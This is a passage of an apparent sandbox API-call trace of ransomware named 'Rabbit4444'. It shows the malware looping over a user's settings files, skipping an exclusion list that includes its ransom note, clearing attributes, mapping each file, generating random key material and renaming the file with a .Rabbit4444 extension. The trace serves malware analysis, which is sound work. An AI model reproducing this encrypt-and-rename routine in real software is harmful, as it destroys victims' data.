dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.863] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.863] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14917361530) returned 1 [0057.863] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1355) returned 1 [0057.863] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0057.863] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0057.863] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x298 [0057.864] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x70000 [0057.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0057.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0057.865] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14917617617) returned 1 [0057.865] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0057.866] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0057.866] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.866] CloseHandle (hObject=0x298) returned 1 [0057.866] CloseHandle (hObject=0x278) returned 1 [0057.866] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms.Rabbit4444") returned 207 [0057.866] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_lockscreenchoosebackgroundtype.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenChooseBackgroundType.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_lockscreenchoosebackgroundtype.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.866] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34af5b05, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x34af5b05, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x57d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms", cAlternateFileName="AA9A7D~1.SET")) returned 1 [0057.870] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.870] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.870] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.870] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms", lpString2=".") returned 1 [0057.870] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms", lpString2="..") returned 1 [0057.870] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms", lpString2="windows") returned -1 [0057.870] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.870] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.870] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms", lpString2="boot") returned -1 [0057.870] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.871] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.871] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms") returned="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms" [0057.871] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.871] lstrlenW (lpString="AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms") returned 89 [0057.871] lstrlenW (lpString="Rabbit4444") returned 10 [0057.871] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.871] lstrlenW (lpString=".dll") returned 4 [0057.871] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.871] lstrlenW (lpString=".lnk") returned 4 [0057.871] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.871] lstrlenW (lpString=".ini") returned 4 [0057.871] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.871] lstrlenW (lpString=".sys") returned 4 [0057.871] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.871] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_lockscreenslideshowsource_cloudbrandname.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.871] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.871] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14918222199) returned 1 [0057.872] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1405) returned 1 [0057.872] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.872] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0057.872] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x880, lpName=0x0) returned 0x298 [0057.873] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x880) returned 0x70000 [0057.874] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.874] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0057.874] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.874] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0057.874] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.874] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0057.874] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.874] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0057.874] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14918482158) returned 1 [0057.874] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.874] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0057.874] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.874] CloseHandle (hObject=0x298) returned 1 [0057.874] CloseHandle (hObject=0x278) returned 1 [0057.874] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms.Rabbit4444") returned 217 [0057.874] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_lockscreenslideshowsource_cloudbrandname.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_LockScreenSlideshowSource_CloudBrandName.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_lockscreenslideshowsource_cloudbrandname.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.875] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34ed5867, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x34ed5867, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x520, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms", cAlternateFileName="AA8BA7~1.SET")) returned 1 [0057.875] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.875] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.875] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.875] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms", lpString2=".") returned 1 [0057.875] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms", lpString2="..") returned 1 [0057.875] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms", lpString2="windows") returned -1 [0057.875] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.875] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.875] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms", lpString2="boot") returned -1 [0057.875] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.876] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.876] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms" | out: lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms") returned="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms" [0057.876] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.876] lstrlenW (lpString="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms") returned 70 [0057.876] lstrlenW (lpString="Rabbit4444") returned 10 [0057.876] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.876] lstrlenW (lpString=".dll") returned 4 [0057.876] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.876] lstrlenW (lpString=".lnk") returned 4 [0057.876] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.876] lstrlenW (lpString=".ini") returned 4 [0057.876] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.876] lstrlenW (lpString=".sys") returned 4 [0057.876] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.876] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_powerandsleep_displayofftimeoutac.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.877] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.877] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14918749613) returned 1 [0057.877] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1312) returned 1 [0057.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.877] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0057.877] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.878] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.879] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x102260) returned 1 [0057.879] CryptGenRandom (in: hProv=0x102260, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0057.879] CryptReleaseContext (hProv=0x102260, dwFlags=0x0) returned 1 [0057.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.879] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0057.879] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.880] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14919056265) returned 1 [0057.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.880] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0057.880] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.880] CloseHandle (hObject=0x298) returned 1 [0057.880] CloseHandle (hObject=0x278) returned 1 [0057.880] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms.Rabbit4444") returned 198 [0057.880] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_powerandsleep_displayofftimeoutac.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_powerandsleep_displayofftimeoutac.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.881] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x353d2c14, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x353d2c14, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x53d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms", cAlternateFileName="AA6260~1.SET")) returned 1 [0057.881] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.881] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.881] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.881] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms", lpString2=".") returned 1 [0057.881] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms", lpString2="..") returned 1 [0057.881] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms", lpString2="windows") returned -1 [0057.881] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.881] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.881] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms", lpString2="boot") returned -1 [0057.881] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.881] lstrcmpiW (lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.881] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms" | out: lpString1="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms") returned="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms" [0057.881] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.881] lstrlenW (lpString="AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms") returned 75 [0057.881] lstrlenW (lpString="Rabbit4444") returned 10 [0057.882] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.882] lstrlenW (lpString=".dll") returned 4 [0057.882] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.882] lstrlenW (lpString=".lnk") returned 4 [0057.882] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.882] lstrlenW (lpString=".ini") returned 4 [0057.882] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.882] lstrlenW (lpString=".sys") returned 4 [0057.882] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.882] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_powerandsleep_displayofftimeoutac_aoac.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.882] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.882] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14919281248) returned 1 [0057.882] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1341) returned 1 [0057.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0057.882] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0057.882] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x840, lpName=0x0) returned 0x298 [0057.885] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x840) returned 0x70000 [0057.886] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.886] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.886] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.886] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.886] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.886] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.886] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.887] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.887] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14919732484) returned 1 [0057.887] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0057.887] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0057.887] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.887] CloseHandle (hObject=0x298) returned 1 [0057.887] CloseHandle (hObject=0x278) returned 1 [0057.887] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms.Rabbit4444") returned 203 [0057.887] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PowerAndSleep_DisplayOffTimeoutAC_AoAc.settingcontent-ms" (normalized: 